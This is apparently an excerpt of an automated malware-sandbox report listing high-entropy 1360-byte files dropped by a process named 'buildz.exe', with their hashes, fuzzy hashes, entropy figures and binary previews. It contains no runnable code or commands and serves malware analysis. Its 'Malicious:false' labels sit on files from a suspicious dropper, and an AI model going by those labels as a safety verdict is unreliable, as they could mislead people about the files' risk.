                        SHA1:B5C3BD010C5F399D297B39DABF61F74203812FA0
                        SHA-256:915FD4FCAD6C035C7C607159CF90B1AD6855CAFD165C11098A26E0D379CB1DF9
                        SHA-512:440DB99F0F6A32D54EAC96F774A5662AE4AD613E8EE21D64B793CC5D0CEFAF290B135E1020969B086B2C704C88F69B2EF134407FD9F4CC9097380877AAB40A37
                        Malicious:false
                        Preview:KLIZU...~...A.NN.j\.....D(0......m...a|.L.4.kk.2z.....V..]&... 1..HI.$...@.7.&.xtzI....h.....G..\v..@.0.$...J.......1..;..Z..j.A...N..#...U...=..T.Nk.KF/..?$`/Z2.*s..r0..F.w..D.Q.}+T?...I.t.......d.k....N..jx..h.:..HX..)..G..B..o...=....3~%re.a.../...z...2..A7..t.-.L.....3{]...n...{...C...~F.........*...'.._.jm..M8A........:....>.1...o4d\.$_...\.n8....*R`,s....c.9..X0..$O....9........#....9...,.....5dB.t..<;`..t...0....,.....X.w...!..lT.I...o..4....6EI.0.q...S:...is...k^..Gbk$.$.Zg....F..5J$'Qu..4....W..b...3.inmL..T..L.`.0.....vh..........g...i{...v(.G...J.8...@.+.....}=.`..mh.Y...EYm%.?7.m.Tj......Q|:.]...Y.~.............Q.Rhcv...T........U.1[............!.........=I.....~..hu.DL..u.L....3\[...a..qm.h.B@.$g<.F....7...I.r_.H.2..d4.....rd.[~+...hE.\*2Y..W...T...(g.fbk.]T.v... `<....)..H...5,....'.v...wg.ESh.I.(O...$..FY..c..`.Q.FwN.z....(yJ.{..)I...{.%*+.7.`.w8..Hn...s"I.).s?.9b\7.>...~.._.......c.....N...$.L.....=.$..._.......:.-..D.\.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.835217579907756
                        Encrypted:false
                        SSDEEP:24:bDCEcUBng0881RT1tbELJgBcz/7BEndeOV4lKySuioWQ5VUbdTby/y9LqoLg+Qgm:n1g2T10icz/YdeO2lHSjMUbRHL1Lg+Qt
                        MD5:FB73A5293342BEEF8C21448F3EAD1F9E
                        SHA1:22FA0D8CC1295623D945446BAE3EBA53335FFE3F
                        SHA-256:477F9254F6FD72571033353B8ED96876F5778130D849323DE95755DA0FD4F442
                        SHA-512:E5E9A79EA972748A38E93BF5C610FEFD30729D05BE46D61C3BE00C5067ED0DDB180ACED4FBA987ECF8A0BE740DD2BA676C362DAFEC717BF5B45329BF14EF7B2B
                        Malicious:false
                        Preview:KLIZU|...x.._]..z.]3...Y...#H....>B.pK.......6..&..$......C._.)....*K.-.l..B.o._&a.I1h.w..^m.e.....y...8B.M{M9u.(.!..ew`b..=Z.a...X...#..(......i..._..-...T+.b...;...M...8.0..B..<..pH..?:...0.1TL.n..k-fZ..r...i.'&...&B..A.-..Z0.yK.@.....@....6...[>..E.M....T...,..W.d...N^8.6".e,..G..4.k..W.z..>.(MW'...K^...>.... e...2^....}..Q.{;y-N..,..D......JU....5r.p...1.>=&....f..H2...2..~7g....T...e.n.C.hV.<...O6.).)../.=..a.G..7:...L-d.l.....\.qr.Q.........[q.F5....:..z..P....g.6..%..L.1..J...lmE$......p(.$.U...C~.......Y*...8J.Xj..Z.T.A.hs.l.....G6mm2.>.=.2.F.A.4.......0L..\T;x..F.6G. ..\4...'...C......u..C....l.<....F.v..K.=....QEad.t..`.%....z..K..8.....u.+.Rf@..1....W.'@n.........(...E..wc.C..z.-+....N...g..d.....k......6#..35|...P...z.s.L.x..)c../.....p...9....+?......V...s.Wt.@5.....>|..R..yF..VL[knfC..M....Hk~.b@A..4|M{\G....).?...8.(PHZ....U..{7n8..O.&AHJ..]H*.O.e.....)..........B/+.d$..MsF.^.........~.n.4....k.8tE.ei.9JJ.$.ylK...W...M......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.875862162643627
                        Encrypted:false
                        SSDEEP:24:hJYA2Eq+eXvV2djfj085HwkTbAK+gB0D01Y68N92d2AkHW4T0z2Z1mOq3fGbD:huARq+vRQCvbX+gB0D01Y6pd2B2Y0z25
                        MD5:B1AD634D2ECBE6A0AD7E9DF4F99C81F1
                        SHA1:CB3A2A3F6DBC49771E1346D0D2AF59301759C260
                        SHA-256:C965D6BFBB78C2D15D2AB000217E615A0A670465138BBCEE2B864434C714C32D
                        SHA-512:3C1B2E56CD989B4E5A1076C1D123614AEAEEABB89EC27759520734F5305D6258295DDC7015CC67B3BE4C20BC20A6E0B6276C415D28E37E0E0119B8BF2D9F219F
                        Malicious:false
                        Preview:LCMFM.kc.=.....y...J&,)m.-&>rpX<.$Y.....}....J.T...6...w.e.a...iuH.`.q@.3.B.u....<..V>....>.1)(..5.....1...j#.r..{Np.s..=..~.\3x.P..Q.._.+.......k..y.!..Z.../p.U....N.}.\..|.%.O..d..H...].U....G...4......$).k.....n..../o#9b..u.......u..<*Y.:.16.E:...".*P..P.R6..:.Q.f.I^.(m...."Kl..T7..|d............:_...T....,..G...n..d>.........g;.p.d........mLX.t.:#..2W..R.K..ao....&.rs.j%.+..7H.a$..38.\.).T.......-.E.M"A..|..Y...:.wjH.&..F..z....w2....O.i.........s.......(DE...........B+..I...=h.e.R.6....p!.f.]...Q2.\.|.N...7.y@m..;.C.....R..y.s%..X.....&".&_B.%v..!f..a,..(......oc....Z....T\.a8...!i......_..lG.L....}...Eb......@.4q....l.<...[~.Q.7pW......K.. ..mY~...}.`Si.N2...c..\..:.,...@1c~.!...A<..A.....+1.XI.y.)...d.c...3..@O..>.g..i..O...........C_....L....f.I:....|.<...;.....3D...S.._Y.@........B...0..}..........3..U......CWK....U.Cq...d...&A..m.....I.H......S]...S......iB.....[.?apmC...........]^.........'|.] .
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.861870059534083
                        Encrypted:false
                        SSDEEP:24:fZiCmMA1bPCl99NlZi6SYiopwUL1mlYd3ptze8uu9fMaKCg5Be+y5QwDM4ZqGbD:f0tW3iYiCwtlYB3a8uaPQBGQzFUD
                        MD5:33FF83144C4D24651B64C50ACC053F1A
                        SHA1:A6B9E26CBF78EC0DD660346A629F1027C76A7715
                        SHA-256:855C8DF142FF4CBE4E153C4AC50AD7328C857066FDC238C81FAC559B36EC0DF1
                        SHA-512:D440B16FEDC2667FB5BECB3A8BE50E208CFD16E5EE57C4D3BB99550586FF4FEFC6B07368A44E1F58EAACD94BA3DDAB6B102EE72F5C2DE48CB17E018E4A17CDAD
                        Malicious:false
                        Preview:MDCSJ~..~yQ,.5_s%.V......ps..*..=..Yl._..R.G...hb..`E.8..D..r~......51..(.*....R..6)...<A...B.B..o.E.pt.O..l1Z_R;...Fi.e/C..Q..........=...s..j6W%.r.cX~.EEn...T.%.{..........x.X...^...1w.'d.&..)C....X.{.I.w...|..#.,VJc....x...A......m.....P.W..t......yI. ...8L./..n.D-H..Xa..v}[..qE:.....Wl}.,-..<<..X...?Y...'2...N.$.....V.G..;.....mx.-L.s.:`.R..e0...........`...K..tNB.G.#...................-n.i.N.....KKm.a..h..d.../B.{..R'1.(.z..8-.w4..w.*.........#.KA.A.h.Ch..../m....o..y?..~.~.ZS.n.|r.b^...V-..#.)!E..._..U./......\.~p..?..=n.#(.@....;0.rys.....4Z.51....f".j&....n.i6...0.Q.B.V....=......F..n80.P.....W.k.o r.S.>.XY.[.a.X.O....a(..^I..l.GA.$,(.;.Z..!#N|.....S0}....6..c..roqb"R@%.]v..T.i...q.em.............._..M... ..&H.$.s...M.)t....@.CJ..qU.D....X.2.d4p..kl.0..zd=...Q...d...)...n.M........U.."..R..%.........TLA....K.iFuH...T..e.....V....?r$.L.~Q.]..&9J.^(x..P....7.2s.....JDY3uZvd..}m..y..T.o.r..%..M.$`5n1....Y%........R..)......'.).]2..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8520203834185684
                        Encrypted:false
                        SSDEEP:24:FKjiz8wwY6x/Ej4qcPu6XTf4cLGEvo6KcKFfhLcokGbD:FKq8wwBDTf4cLZo6dKFfhkUD
                        MD5:0C8B1B12AB054A9578C3FAB6BCA0E2AB
                        SHA1:49788A247353EF88547436440FE835BCED0A6851
                        SHA-256:B8532BE3991CAC0C5CBE5E959133884A413FBB80BF31519D8F98FDA2EBEF765C
                        SHA-512:A22D32CFB40ACEF2A15541316646ABBE45D8A5533C9580061DA34D6C9F8EC7D05C834185122F58A929F1686FEA9B210632A3E6D44FEFE9DB052D8F3113067007
                        Malicious:false
                        Preview:NVWZA3...y..AB.G..xHqR..I{k9H.".......]..Kw..NJi.......O x..r9.m.C..ei_&.".XHM.~`.T..l.Y<N...D...F...}.%u.;(!.....w..I.U.....0.. ..... ..z._.s.k..[%.4$.PkXxri..]Y...O..P..S....Y...Xu.I....s........`.c....A...?j...[..o.L.<Zv.).r9...6.?l.G.F......b.L.O....J.o`.....Q$oco.?..&3..vL.d....B.tk...Mv.#h;,....H.Qi..D.M.........3;..m...q.1.5..2.#.Vf....eI..>.$-.+....s...=....]u.....h9....,......#.@.E!.;.f.F..&........s...i....h...k.x6n..N9.x......=.u.....Y/...........k7>.=.T;.....do...5i.L.?y.=..t9c......Y.P.....fzv.E...a/...J%.n...}......I...+..D.vZ0.].`|....N:t.f....H!_.P.#.~.w..>..CM.V.Ki.l.<.Z...m...v..v........,.....)....Nq{..8k....[L...M....2.X.J~.,h....C.A ..N..>..."..a...H..(Y.......<.O....Z.y........l...P......."a8...........v.r?...a..lo.._/8.p..U..j...f)3#.<..G9.\CW...|.@..M..p..jC.....0?h+J..<..I.....^....1%.....2..%...:.<E....Q(.&*...../F.<.*BS.........g*......>../p....5.Z.Y..!..Zm.E-....-u..e&..vCy.s..{.D&.U.b..7....o.lM^, ....|.G...@.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852586270070853
                        Encrypted:false
                        SSDEEP:24:5fxzidaQoBuB/JYm2sHYnVHFdqfmiSE3BT4Lq446mr061zO5pUKGbD:XzidaQoYB2m2V5qpx0LUTr0mzO5aKUD
                        MD5:CDA49E4401D2861CE17D4ABB6268A145
                        SHA1:E7196E8C31AA9A8F1F62D8F025C45B5AD42FEF3D
                        SHA-256:63CE5FABE18EC706E9A3C01E713608ABEE31860F356FCAAB209242BD1E3DDD72
                        SHA-512:BE014CEA37FDF78F4A8DCBEAF8C753C2ACE09F0403AFE03DD5B4D886D7C071C94385F8C27EBFC41F5FE6FA10DE84137EEFE424350A198D9A1492790C3C79DD4E
                        Malicious:false
                        Preview:NWCXB2h...y.x.Y..H.]....70TM..j...s..........).-$u|.:+.13..q.h_%.:AT..f.hp..4....{..F#.o....L..r.d.G..B...m....a.9...t..-.'...B.GxjoG.3[.V.......R.M.^o...X.3.Zi.._....X.7.yO...9.w..R.&:.%b....]....Y{.....Xw"..*a.IB.WS.sZ.XGx..<X.....o...(.kmM.......m..t.D.....q......j.S.....%io.Y....)...j.+....t...H...nZ:..v%...F5]B.......%...`....;$..[..y.2....u=..%.(:j+.o.=..}B......t.wtJ........s..<.s..|..Ub.nMp..$...22{...,.*I...LP.......3.1z..;..N._&.kuQL....0-..F....#......pk._U^..-.F/.~....x^..#p...G..}..4|n|.5...%...r...u+~.....pr.#.\...A.:P...a.%...x-q*....T+m...n7..Ue`.-..0....T-j|?.....4\)..L.."....b .*....&...Ui..C|W*..|.......'.o.........k.........*h.C...pd..-.....u&.@.....nM.K.h?;.......3.P.KHkG.n.s.....G..e...k...................&2Q.ybv.....W:..St.4.z.1.b1.IX.`x.;..4p. .v.`t.J..x.z...n#...E..46........?.!xx./i..lw.....<.X....C+....dK...1 .@d@?'....s....?..1..`)...l.._|..v:.^....yw.V[...........I...L.u....U/;..hz.Oz....&....>,........Q...k
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844825195041434
                        Encrypted:false
                        SSDEEP:24:6GGpUU7lF9iu4RO0SeaTnOvoxfFnBzFHgCimAa9vgrgkyelKln/nlxPt36iW7GbD:3473wuoSbTnOvoxfFnBzFdXUHlKVNVt7
                        MD5:4BD876EFF4EF280AA532EC39D0C64928
                        SHA1:1794202988FA87E89E4F19AB2A3B2726E2AA9D3F
                        SHA-256:C8A337929082F4C367C4F1D656DB421D1BC7EF9A2840514DAAAD8F21280DCDFC
                        SHA-512:939FADFABEE177D6BB3485D17F546F48E7939495B5961884DFF016D37B95550FE4D4D21BFCB5114C7FC47B7A7FECF83BB761CC9FCB53A2060FBF324A0EB131E4
                        Malicious:false
                        Preview:NWCXBc.903....z.Bp...u)....}..~.Y.?.t.F......C2.."......l..k..g...C..|.L.......>.U..../.....1.;.;..<..<..SY#]r*\.2...6I;....t.D#.y.....N.]...[|6h.*.mZ(;E3v.D4..0...N.....J....z7D...d..N.s.a..J:'..".Y....1.Q..K..8.)m...K........u!.."..Y..y.'j..-.UC.a.iw....R..o.........*{.W-z.H..;..x.'....6..2mk....Q......./A.....M{i.oa(....;...p...H.e}C..Q.d)..,.+...7.......h.qT...........4..;#....)m6g.2@I.u.2N2...u.... ;$.:~..oJ...*.~xG.6.f.Z;...$E......u....C.....*...6...4(e.?..+.3.o.,eX.\=..D..G.ZQ...P\.*.R.,...O.H..1."...Z.4]...W....I`.$.q.f.D.....Y.<%...p.FJ..[*..,.!wnA....6.i}_C.U.f......i..4..D....id.F..n..=..+<M.T.}..$w.m"V}.".....#...[..Q....+w.hSb.E..&0.}.:.:.......$..+.._.....?...S......@|.2..|.3e).K.=..5..CQb..f...&.6....~(.CY.%..%.d.pAu..(GD...E........RkZw...).!.Xn.4sx3.[...w...|.S+S..5T.o..yc.C...ejs...,$..!...5...a.L0...d2@S...?...U..@...%.p.kn...]E..o9..\.Ht.....4..O.A.@.J.0?.'..(..Rj.A.8..U.EX.u.7!^....R.i#..9f..:..[ZF.....q..=q..)...^o...Q.#oc
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.826912192118389
                        Encrypted:false
                        SSDEEP:24:JInJoWlMC4S9dbRfzIQdatV9UGo4ijAacaciAkwKLHZDMN4zPtpGbD:Sn59d1LGjFovUacXkwKj5NtpUD
                        MD5:A2091FB8EAC3586A7DCD128D60B34402
                        SHA1:E4C59849128B5B70102A4E7F4A629726CD496884
                        SHA-256:E486EFA5E56A47B8AFE4346271C45C8E198B884B5433D39751AB2838AEFBB518
                        SHA-512:C169B66B64A1376F1ABA1062292EE5250ECB6EA1ABCE9EA367AB0A8E949AF1EAC647EC31197BAA15CD84DA3C863ACAB798C262FDCD6F1AC90B0777377AAAE436
                        Malicious:false
                        Preview:NWCXB.>.h.;..J.vF.}..u...Ne.]).:....r.<.kUn.g..^$..Z..x....< ...O....l..R.........6.....q....)k.\e.....Ke|...g.,...G.t..Lq.{.-PSI..b/...K=...5..P1mg61..=(qe.z....P.b!....Z..._.l.V..3.Z .Z`...u....q.@.~.OV<.<}..pk.^fO#..uRu...V..^=.25D.......kh._.$:k..1...^=..^tCX..W'N.....C.'DZ....]NH..1<9..L9{x.....g..y.Y)T./....=.l...1.h{^e..Q...i!."....\/.9.H...2P :L........z.....A.V...IX..<.T....q.....Y.%#w..k.....'m5.....eA.f.U^Ee..p.).....AZ..S.6.....P@;E5.....%.......N.C..^{G........D.T5..Q...6..$..cA.....?..$.&....\.Z.9....]B4Du..6M..V.."...F..Z.|D..>@$y.0..7.*..I.D.1....N:..Mj.R...r.d.O..&....z..w...&...N.C.E.F....J..z.J..W....m..2.)g.,>j....;.J[.yc..8...1fL.".M....%.x........H...k..7........5C...2-.D.d.h.......+"..vg..g..k...iJ&..&.c..."6.g.,..:.....b.@PM?...S.....,......1%R.@Dy4T9..TXL&..{....`.izQ..........S&4 5J../...m..[....S..,..5...l..j.!..A......X..|..Py.b^M|.6.'...W.c.|..7...Q....R...u.m.2.-Vp.....x/_.4.._.jk&.v.fo..1..R=.Z.Q..[tN..'..:.M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.877329192997203
                        Encrypted:false
                        SSDEEP:24:mZBYPafxE1MFz5JvQrBETfL9hSTNurxExbVGvEwzfWD8hCA/vApifHkztQ22rIvr:G+PezPvmuLbEucbVGEcfWg93Mifr/VGJ
                        MD5:CCD80921701C08062AA3CE8606472201
                        SHA1:86343A9FAECDCE295863EFC313DBCB85265A89AE
                        SHA-256:65B4B9E2E161D4184BAF79AC88FE50B5D99C79578E4623EE5EB3564932770BD3
                        SHA-512:85E735062448B0C1B36636B21AA388C0D14BA1B88D84D64388EC8C2C9ACB1F59630A8911108A92B754748CB1DE0DFA443C265B1F60AA59BC03E7D56FCC570751
                        Malicious:false
                        Preview:NYMMPw..."...@..=.t.../..n"O......".:7.q.Ve].aV.. |Q....#..d...P.a.BTXCi...._...^.F......J(.......x>:..F".i`<O.sQ.I......r.#.6.u...A..8...8........Yo.....z..&.r..69.....K&.z ..,.a.Yl......j..we...3...7.H..,^Z[..#....i\.g.~8..x@:8G.yY5..K.!..r.2m.$..a..>..4]....XH....V.DXO...S....>.>..:o;..D.;V...yr...'1.....}....Rgc.l..A..m5.V..E,..f....8...E_.09..i...y.o.Ox...y.Z#...%............x.X.dN.Q|.. .U....[.C....$i....HZ.)hE......38...Q...&.t.....g....L,...7SO~..$*..j..+....@......q..Q.r..j....o..c......h..p.]7.&..c....@z...t..Y...~...>0..0Y.._k.\S.f.2%..gj.D.....K..@yD|..+....o.....EC..Ux>c\.....[.s.FU~..'..`.....]@v....h*..K.t.....r.........6r..0m.[.w.w.7..4a....x......G...g...R.L.{.......:..#...aU,.s...f...;.}.....Y.<L..K..PC..Ob6. ......J.p..'.:..r.v..{.....3Y.3...v....z.Lv...%...1,t."....w.^.VW.[.....ug...)=..;J5......\.Cy.......T..K.}z}...........R..h-..:kC/.ZR.n....,.c....._nL..._..<...9....S...:..3.x...{.{Y......$.....s......p.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8516757487971365
                        Encrypted:false
                        SSDEEP:24:jGePUOi3+ie6RYNAqmgmE8aZ2QxJB2aUmQXI+BJN6k9qr5BhS8wMxNoNWHGbD:jGexi32jP9mEI9bY+BJNX2BheMxNYWHA
                        MD5:481AE9486FD68C9145741FB7206A97E2
                        SHA1:5961D85B9E37D58700936604041862EA88971B04
                        SHA-256:B6E7C27F35596559A7F4E68122BE3C49F876019C051DA7ED62C6AB103EB6D81D
                        SHA-512:D2903D1A4708242653C6E697D9B2BBDA60E5BA0F82436F8EF09921BCECE29E7AD8C39933363A2606ABC998CE41EC78636C61A586C6E33A5EADEFFC6161FDB2FF
                        Malicious:false
                        Preview:OKWJN..T..........4.4...E.y.._.v.+ A\..d..<i+.-.?5......]..4...H7...h..0H.../".c.L...+.xL./9.....;g.|4L...IF.[H...E....Z.P+......i......+..J..a....y..ur'..9...M.QQ...T.8...<....2..L....^..x.k....w.....F9.RQOK`..q.*^.... ..G.ai.b.3..A..%M..1i..\.5...<.db...Y......V..FD=....&...m.}.>...Y..L....K..*..."..D..K.h......&`........{..2#.p.........g...+.J?{..%n.`.R.......se..V.0....A....o..7..vro;P.l..w.....L.....?.A...s^.,{....#..z.k.-....rg...].......T..!.a..`..s..N..%..C....P...b3h.s.s.....q.....(......0..(..F.d....v.`.B....._.^7.|..0.S^... \..b.V....$...q.BhP@......(r~{..^.F]O..5..>x ..?b....E.5....N.f9..3.Qe..&..K.i?.2.9m....Xm 4.0......Y.n....~.......X,..i..h._<....#.=.(.|.Ow[_cI...~%Z....(....W.+.I..!gb$w.[=....EV.!c.Vn.....?.n....@.[.....9~.0x....1K9.\Y[f....A..'GTLJ..ah..F...v....%.,.[...C.P..@....T..).c.r..\C."o.........+.y..Vq...9...r..4.O....t....C..G.d.Q2.e..s%.q...z8;......DvD..L...n....!.......f......6.. ..F(.._.~Iu1.#...R4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.85521651545688
                        Encrypted:false
                        SSDEEP:24:h8lcGspBwAM+PtwugnsfgFM2i0d4dg1loMT+9ESc3tJaGbD:hdgse6gNtf1l5TVzJaUD
                        MD5:324D866700B9D240EEC614A05B587396
                        SHA1:A14D5BBE0812EAC70BC6259D9A1299F0A712B849
                        SHA-256:54E2BA3E59044BA9EDEBF70742812B905426151868F47E3CB4138610E8C2870D
                        SHA-512:4756F133E2ECDE04FCCA1ECEAAAA0DC2E6B16721320C76AD947444C86A62A58AFEA0450EECBC5E65F3B360DCA6D0F7E667A3A6424CAD536ECC2BB45BACDEEF9B
                        Malicious:false
                        Preview:OVWVV.....h..8..t.)..%E3.;..L>."...b...x..u.Ld.[.)...!.t..u.....Hx.w...0W$OL[.O$?....r..vS..i.......1.R......iy.j.....'ad....a$k{h..........<.>..'....9q'c.z.5..W.x.Zz.....Wc...*......^q.,.....,..I.:Y/....4...O$..&`!M.P,...4.wkG.7q.....WF.....u......s._.B.Y.i....h...(..wM........0...$?....i..!u._.o...BZ;.hc...R..w.d.....JZ....t..V..9&`()o)...A..txG~=Nr...3....k.._. .V...@O..+...J."$6.'..'.Q..c.<..<...;`VD..lh.T.1.N...U.6d...-...t,.......dRa..kp.."......A....t....A..*.AEf...|...s(@..E..;%k..cK".U.,.PHHm..}.NS........@...$..y.u)..,...c...z..p{.9x..R..U.|F....(v._r....*.A.....qI.P....nJ....._..*......G.....?.4..[./O."b...a..k../...E.....s....;.2.{...N.;.;/^'...).......#P.^P..Y....(U...P.....}.C8..9..3....0...._...\.$8.........p'.\..L.(...3.....R'p"..:.%n.{R.x...]..,.!.E.uI...8.Y...X..`.5.YA.J.G.......N.c..?.q4....K.r.k.wk@[...m#.l..-B.=q]...5.......l.B..Vh..m....Lz.*.j.(.`.b3.2.b... ..B$.!MP.fy.3)....w~...T=.*...^[..k..R.i.X..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844315068233303
                        Encrypted:false
                        SSDEEP:24:jWj1vkjeWOQQJ1EO2COwCizWNjwLRJnOgYCY9fYi0gvGbD:jWhQQJ10wDY6JnOrpt0MUD
                        MD5:3F53400EDD055A0457607E657FF5D1A5
                        SHA1:83FD9CD16705A1A53F65D48ED80C726F1B1973E7
                        SHA-256:947335B51FAB6AF5D249117A7393268EC6928DE75D6BF00D7E2A927F71C72DF4
                        SHA-512:FD60DE86E32C023AF4425A96D51BCA1D62C3CE39DD9486F734587B18F7DBB3CEB377E13C081A9990E37574F2B6F7241EBB0DF032CCB045E11E2A1326B71AB135
                        Malicious:false
                        Preview:PALRG....l...I@.]..}.....S.'{.t.&C-...8......OF.R[.A../.Hi....x..&F..D..j<..y~/% ...4..N...$../.f.<...X.... n..B....~..P9...c.....&...(...)....Y.Y7.]..x.........b~..7c......,.A..5....{.0..+.Y...=,.$_....j+@...=c.D.....'*...[0......,....B..m..rq.<b^.G.......3..o<".?;...B.!...'...n.G.0.!."n.j.+..:X;|2....n-.wQ.IQ-.....q.........`.[ht...."....Z..Sd.n....Pi.H.h..u..I$...1J@....-.h.Z.lY..(r'S1.3xo.q.nj...~..;..6.i.%,e. GZ..1.(Tj.K..%=--c.mg..I{...>...8....nA_..b....b.Mo....@.....X.\....&D.}.@.F...(.S\!M.TiQ.....0.zf..z4.&..}...g.. ....j.LI\,.C.{A.4'S...h.OY..D...c..6.0.@d.*..O..{Yk..8.....ha.-.H.g.!........\...+.....].&....+.%.h..U..h...e=+9..4..x..m...._...2...2x..v;A. ..h.RHU.....!@H.r.w<.......D.0WJ....8.._h.P..#..*+.l..<..1.b........y+fdmQ|W#.......4..v.B.in.\ `..b.Q..!..My...P...}O.:i{k...|.!.....N....".jf{...........i.-...7.lt..V.R..2.I..k..e....g.............Y....[.M...q..h..{p..z..T.B...eM..8cO.V..\i..H..W.......O.b...QB.<..~
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844082891343296
                        Encrypted:false
                        SSDEEP:24:QtDjzgWH4XaKB2g3I88QTcDOT8BaWNKZacVRiHoUOPagujzdhkFo7EGbD:GDYw4XB2g3o4cDhBVNKZTCIUOPVunoF6
                        MD5:9D69007E897E8D6711F0461C9C372ED0
                        SHA1:176D455887843E57AAA5C1A867CE5E36CB829EEE
                        SHA-256:8352B48C4AD643635D2EAB57C4244E733C079436EB49F9AA30AF5ED860770EB3
                        SHA-512:A992C2195C6D4200F8968BA731BF8CDE8FA231547F3C31BC9E90DBA870F38EB32D26EE9AF3F8EEB188D842A7BA55343864ED0833915434DBE1129910183E7156
                        Malicious:false
                        Preview:QCOIL....."_...ha+.r...U...u...P1n!...I1.1...r.Wq......m..%tJ.t.*.mb...d....'.Xd\e..0.a........N....fg.e.=f...@o.3e.$..h...@....V<..7.d.G&.@..T....&.X..q..0.z...E.....iv.....&dN..E.4r)Wj.{..,.e`.~......X...k.[.4.=&W..u~...5.ZG...o0.Zf...vG%....Vc).2..8.`..>.D....1I}...>....M\Q..`..f..\P......B....}\.|`$.D.vM...|.........t.>.q.2.)..2k.Uh|Ob...o.k....hhk#.S6.R.D&..........V....H...3(&. .6.V.V.(.9.R.d.d<.....&..(...O...=.\./nI.$..H..(.2..#R...H....h..k...e..?.i...|.w.......~.(S..h......x.CJ...3..S.........z...._../."....Ox..l..8........N1............W.....~..kS.s......)..9..'.M.Yv.hw.Q....l....D.4)..A1....T. .-.-...'.[..QVq...._..x..&...t.5&.qR..W....@1A..?..7}.r[...........n.0...<.."; M.....w._nCY.C+..*......G.g......8.[..4H..xX.2.T.4......5)......$.>..........q...5..n!..gs.>x....%.k.....ng...&..nV...U&.d\...._Zs....A.9;.,J......Vr........P.u...r0<.m..2.Bd.u..d..L..g...}l<....a....zt...g$..9.E.8.W%.J...M...4..U.1wck.W.3.=.s)..c.$..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8281734652592405
                        Encrypted:false
                        SSDEEP:24:wTiIZ2FtDBHImvtgE9FbZ7ZXMhby5E01xftGsEaZ6VHGbD:wOIUrZIQgEbZ7ZXMheG0PftGDaZ6VHUD
                        MD5:6AB9DAB922198B2CFBCB1B0047EF40AA
                        SHA1:D098F2D9D2D50A576133812635EB5FC757631B4A
                        SHA-256:9F5DEAE071D78FD7EB2652D76804F23146CB94030E4EE18C1E5DD59D42029DF8
                        SHA-512:4BBA7CD13DA3B479AE52A10A31F91AC8ACA88FE05126646C88673360B6645B9BBF323EC8FBDEE4DAC3E664C63F8D6814CE8960F75FE553370E1375B23806889C
                        Malicious:false
                        Preview:TWGTY..~y^.eI....+sn.....EL.-.:..8<_.........,.....5!.....a...O..{...dcP..L;X4VUBH.`....o.......r.3:..'*.7U.#..8V..I......."].......Nw.k...,.$s.S..E...9...f....G..o.......`......h(..........2X4.....q.(!.*.w.e?...`.+LAs.@~.....<1v..`W.....1o.!......!.P..hJ.F..zAr...n.....O....<.,..i.s.o.j....Y....P49....^.!..!...v.....=......D...X~].G`o...':.7....;....f..O.3..J!T.qy.Z.[.....xqH.(..%._.B.2Q.Z...A.y. ;l.N.....fP7c..4X.t...s&ON..aeMw....F.G.]z.SlR.....w.../EYp..*9..1.)..w".......[.9.....W...........;.h.......W2-..e..-...y.. ..e...@...*......q...k...........1....u..hO|n&.t.. ..W....R2..U....%{-..R..uCl.k.[......v.{ r..'..:1.I[.[.......2.@.#/R.|Ds..X..2x..c....DN........G.Vs...Q/.82.k].a~T.m.</.ux..Rf.bT.R..>.......N).|3.'... V....P..5C"....A....2..dY..xu..dB1....U8.c8{.Fr..L0..N.....G...T..@D_....)V.n..x.0.....2.c.S...7...TwT.H...,+.,*...=<S.......2.2eZ..{.......C..R .....|....p....q}-.6.K.`.!Z..cBy.w..|.3.)......B....R.Iwg
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.83686360024511
                        Encrypted:false
                        SSDEEP:24:5fwLPRUH3hsiPuJMwst/zyKHa+wov8WS7+hjPwraGG6mw80EzYeRuGbD:kRgsFiZtVaCvugjwaGcw0VRuUD
                        MD5:A1CA6428B9FD0DA0B80738E707CC6A80
                        SHA1:544D96FB9CF9F0FBCA21B0D13EF3D5F59D54D078
                        SHA-256:69498D524F72F50506A708069F148F2EF719B85A37BBD75994482056E110F1AD
                        SHA-512:9DAE2ABAF6B056448986B392F7A1FB791CBB52878AE059551F05E1DCDFE1CBC069387283FDEC27F522246C7A3980C992EE2FEE52E188BA71E0A387A9C708B9F7
                        Malicious:false
